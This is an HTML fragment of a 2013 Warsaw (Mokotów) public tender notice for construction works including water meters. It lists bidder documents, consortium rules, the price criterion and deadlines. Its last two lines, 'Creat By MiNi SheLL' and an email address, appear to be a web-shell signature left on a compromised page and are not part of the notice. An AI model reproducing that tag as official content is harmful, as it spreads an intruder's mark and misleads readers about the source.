<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oferta oraz dokumenty i oświadczenia, wymagane w postępowaniu .

1.1. 	Wykonawca musi dołączyć do oferty w terminie wskazanym w pkt. 15.  specyfikacji istotnych warunków zamówienia i w formie określonej w  specyfikacji:
             1.1.1. 	wypełniony i podpisany formularz oferty zgodny w treści ze wzorem stanowiącym Rozdział II specyfikacji istotnych warunków zamówienia,
 1.1.2. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 9.5.1.2. specyfikacji, jeżeli oferty będą składali Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,
1.1.3. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 14.6.3. niniejszej specyfikacji, jeśli oferta będzie podpisana przez pełnomocnika,
1.1.4. informację o części lub częściach zamówienia, które Wykonawca zamierza powierzyć podwykonawcom, o ile Wykonawca będzie realizował zamówienie z udziałem podwykonawców,
   1.1.5. 	informację podmiotów i o podmiotach, które będą brały udział w realizacji  części zamówienia, na zasobach, których polega wykonawca na zasadach określonych w pkt 8.2. siwz, 
1.1.6. 	oświadczenie o zapoznaniu się i akceptacji specyfikacji technicznej wykonania 
i odbioru robót na załączniku nr 1 wg wzoru załączonego do wzoru formularza oferty, 
  1.1.7.	oświadczenie na załączniku nr 2 do oferty wg wzoru załączonego do wzoru formularza oferty, iż po upływie terminu ważności będzie odnawiać ubezpieczenie 
na kwotę nie niższą niż równowartość 100.000 złotych polskich na czas obejmujący wykonanie przedmiotu zamówienia oraz, że przedłoży Zamawiającemu do wglądu oryginał odnowionego ubezpieczenia w terminie 7 dni kalendarzowych od daty jego zawarcia, jednakże nie później niż w dniu podpisania umowy w przypadku gdy dotychczasowe ubezpieczenie wygasa po terminie składania ofert, 
           1.1.8. 	informacji określonej w pkt. 16.3. niniejszej specyfikacji w przypadku 	zastosowania  przez wykonawcę innej niż 8 %  stawki  podatku od towarów 
	i usług,
 1.1.9. 	oświadczenie Wykonawcy zawierające wzór dokumentu gwarancyjnego 	określającego zakres gwarancji na załączniku nr 3 do  oferty wg wzoru załączonego 	do wzoru formularza oferty, potwierdzające udzielenie gwarancji  na przedmiot 	składanej przez siebie oferty na okres nie krótszy niż wskazany w pkt. 3.5. 	niniejszej specyfikacji,

1.2.   W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, 
o  których mowa w pkt 8 SIWZ, Wykonawca zobowiązany jest złożyć wraz z ofertą następujące dokumenty: 
1.2.1. oświadczenie na załączniku nr 4 do oferty wg wzoru załączonego do wzoru formularza oferty, że spełnia warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych, 
1.2.2. 	wykaz robót budowlanych, wykonanych w okresie ostatnich 5-ciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania potwierdzający spełnienie warunku określonego w pkt. 8.1.1.  specyfikacji na załączniku nr 5 do oferty wg wzoru załączonego do wzoru formularza oferty, 
1.2.3. 	wykaz osób które będą uczestniczyć w wykonaniu zamówienia, potwierdzający spełnienie warunku określonego w pkt. 8.1.3. specyfikacji na załączniku nr 6 do oferty wg wzoru załączonego do wzoru formularza oferty,
1.2.4. oświadczenie,  dotyczące posiadania uprawnień przez osoby które będą pełniły funkcję kierownika budowy, potwierdzające spełnienie warunku określonego w pkt. 8.1.4. niniejszej specyfikacji na załączniku nr 7 do oferty wg wzoru załączonego do wzoru formularza oferty,
1.2.5. opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 100.000 PLN.
 1.2.6. dowody dotyczące najważniejszych robót, określające czy roboty te, (wykazane przez Wykonawcę w załączniku nr 5 do oferty -zgodnie z zapisem pkt. 8.1.1. i 9.2.2. specyfikacji istotnych warunków zamówienia) zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Dowodami, o których mowa w zdaniu poprzednim są: 
              a)poświadczenie,
 b)inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczeń, o których mowa w pkt. a),
 W przypadku gdy Wykonawca wskazuje w wykazie robót, roboty wykonane na rzecz Zamawiającego, nie ma obowiązku przedkładania ww dowodów.

UWAGA
W okresie 12 miesięcy od daty wejścia w życie Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (tj. od dnia 20.02.2013 r.) w zakresie dokumentów określonych w poz. 9.2.6. SIWZ. dopuszcza się stosowanie dokumentów wydanych na podstawie przepisów obowiązujących przed zmianą ww. rozporządzenia.
1.2.7. W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
            1.2.7.1.  pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
            1.2.7.2.  pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.
           1.2.7.3. inne dokumenty i oświadczenia, zgodnie z wymogiem pkt. 8.2. SIWZ.

1.3. W celu wykazania braku podstaw do wykluczenia z postępowania  o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą:
1.3.1. oświadczenie na załączniku nr 8 do oferty wg wzoru załączonego do wzoru formularza oferty o braku podstaw wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Prawo Zamówień Publicznych,  
1.3.2. aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu 
do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie 
w zakresie art. 24 ust. 1 pkt. 2 ustawy (UWAGA: W przypadku osób fizycznych Zamawiający uzna za wystarczające złożenie oświadczenia, o którym mowa w pkt. 9.3.1. siwz na załączniku nr 8 do oferty wg wzoru załączonego do wzoru formularza oferty), 
1.3.3.  Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt. 8 SIWZ, polega na zasobach innych podmiotów na zasadach określonych w pkt. 8.2. SIWZ, a podmioty te będą brały udział w realizacji części zamówienia, Wykonawca zobowiązany jest załączyć dokumenty wymienione w pkt. 9.2.5. i 9.3 i lub 9.7. SIWZ, odnoszące się do tych podmiotów.

1.4. Zamawiający wymaga złożenia wraz z ofertą dla wodomierzy zimnej i ciepłej wody
       jednego z niżej wymienionych aktualnych dokumentów na potwierdzenie, że 
       oferowane roboty budowlane  odpowiadają wymaganiom określonym przez 
       Zamawiającego:
        - krajowej deklaracji zgodności ww. wyrobów z Polską Normą lub aprobatą  techniczną (dla wyrobów oznakowanych znakiem budowlanym B),
- deklaracji zgodności ww. wyrobów lub europejską aprobatę techniczną (dla wyrobów oznakowanych znakiem CE)
  oraz oświadczenia w formularzu oferty, że oferowane wodomierze zimnej i ciepłej wody spełniają wymagania  pkt. 5.1. STWiORB są  dopuszczone do stosowania w obiektach budownictwa mieszkaniowego i użyteczności publicznej zgodnie z  Ustawą o wyrobach budowlanych z dnia 16 kwietnia 2004roku  Dz.U.04.92.881 i oznakowane znakiem budowlanym CE lub B.
1.5. 	W celu wykazania braku podstaw do wykluczenia z postępowania  o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 2 pkt. 5  ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą: listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy pzp lub informację o braku przynależności do grupy kapitałowej - wzór druku stanowi załącznik nr 9 do oferty wg wzoru załączonego do wzoru formularza oferty.

1.6. W celu potwierdzenia że oferowane roboty budowlane odpowiadają wymaganiom określonym przez Zamawiającego  w SIWZ; 
           Zamawiający nie wymaga złożenia dokumentów na potwierdzenie, że oferowane roboty budowlane  odpowiadają wymaganiom określonym przez Zamawiającego. Za spełnienie tego warunku uzna złożenie oświadczenia, o którym mowa w pkt 9.2.1. SIWZ i wypełnienie formularza oferty.
 
1.7. Oferta wspólna
1.7.1. Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 Ustawy) pod warunkiem, że żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 24 ust. 2 pkt. 5 ustawy Pzp, a taka oferta spełniać będzie następujące wymagania: 
1.7.1.1.	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego;
1.7.1.2. Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza lub inny dokument (np. Umowa konsorcjum, spółki cywilnej) powinien być załączony do oferty i zawierać w szczególności wskazanie: 
a)  postępowania o zamówienie publiczne, którego dotyczy;
b)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby;
c)  ustanowionego Pełnomocnika oraz zakres jego umocowania;
1.7.1.3.Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. 
1.7.1.4. Każdy z Wykonawców (każdy członek konsorcjum)  składających ofertę wspólną musi wykazać brak podstaw do wykluczenia z powodu niespełnienia warunków określonych w art. 24 ust. 1 i 24 ust. 2 pkt. 5 ustawy pzp. W tym celu konsorcjum składa oświadczenie, o którym mowa w pkt. 9.3.1. i 9.4. siwz podpisane przez wszystkich Wykonawców oraz dokumenty określone w pkt. 9.3.2. i lub 9.8.1., 9.8.2. siwz  dla wszystkich Wykonawców podpisane za zgodność z oryginałem przez Wykonawców.
1.7.1.5. W odniesieniu do warunków określonych w art. 22 ust. 1 ustawy 
wymagania te muszą być spełnione wspólnie przez Wykonawców składających ofertę wspólną (na ich potwierdzenie należy złożyć dokumenty określone w pkt. 9.2. siwz)  z zastrzeżeniem, że oświadczenie, o którym mowa w pkt. 9.2.1. siwz podpisane przez Pełnomocnika lub wszystkich Wykonawców musi być złożone w imieniu wszystkich  Wykonawców;

1.7.2. 	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularzu oferty.

1.7.3.  Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.

1.8. 	W przypadku złożenia oferty wspólnej Wykonawcy solidarnie odpowiadać będą za wykonanie zamówienia.

1.9. Dotyczy Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej.
         1.9.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 9.3.2. niniejszej specyfikacji składa dokument lub dokumenty wystawione 
w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
              Dokumenty, o których mowa w pkt. 9.8.1. SIWZ powinny być wystawione nie   wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
         1.9.2. 	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 9.8.1., zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy,  złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy pkt. 9.8.1 SIWZ odnoszące się do wymaganych terminów ważności poszczególnych dokumentów stosuje się odpowiednio. jw.
         1.9.3. W przypadku Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej wszystkie wykazywane przez nich w załącznikach do oferty i dokumentach wartości i kwoty w EURO będą przeliczane przez Zamawiającego w/g średniego kursu NBP na dzień upublicznienia postępowania.

1.10. W PRZYPADKU, GDY WYKONAWCA W MIEJSCE KTÓREGOŚ Z DOKUMENTÓW, 
O KTÓRYCH MOWA W PKT 9.2.5., 9.2.6., 9.3.2., 9.4., 9.9., NINIEJSZEJ SPECYFIKACJI DOSTARCZY JEGO KOPIĘ, KOPIA TA MUSI BYĆ POŚWIADCZONA ZA ZGODNOŚĆ Z ORYGINAŁEM zgodnie z zapisem pkt. 14.6.4 specyfikacji istotnych warunków zamówienia przy czym w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z zapisem pkt. 14.6.5. siwz  Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów np., gdy złożone  kopie dokumentów będą nieczytelne lub będą budzić wątpliwości co do ich prawdziwości.

1.11. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. Dokumenty 
i oświadczenia sporządzone w języku obcym, są składane wraz z tłumaczeniem  na język polski.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.1. Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień umowy zawartej w wyniku rozstrzygnięcia przedmiotowego postępowania o ile warunkiem wprowadzenia takich zmian będą między innymi okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te będą korzystne dla Zamawiającego oraz w przypadku zmiany porządku prawnego, a także w przypadku zmian zawartych w specyfikacji istotnych warunków zamówienia. Zmiany, o których mowa w zdaniu pierwszym  wymagają formy pisemnej pod rygorem nieważności.
1.1.Zamawiający dopuszcza możliwość zmiany umowy także w następujących przypadkach:
a) zmiany osób uczestniczących w realizacji umowy ramowej;
b) zmiany wymaganej sprawozdawczości i rozliczeń kosztów wykonania umów zawieranych na podstawie umowy ramowej;
c) zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia 
    umowy ramowej wraz ze skutkami takiej zmiany regulacji prawnych;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgnmokotow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy ul. Irysowa 19 02-660 Warszawa Dział Zamówień Publicznych pok. nr 34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2013 godzina 10:00, miejsce: Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy ul. Irysowa 19 02-660 Warszawa Dział Zamówień Publicznych pok. nr 34.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com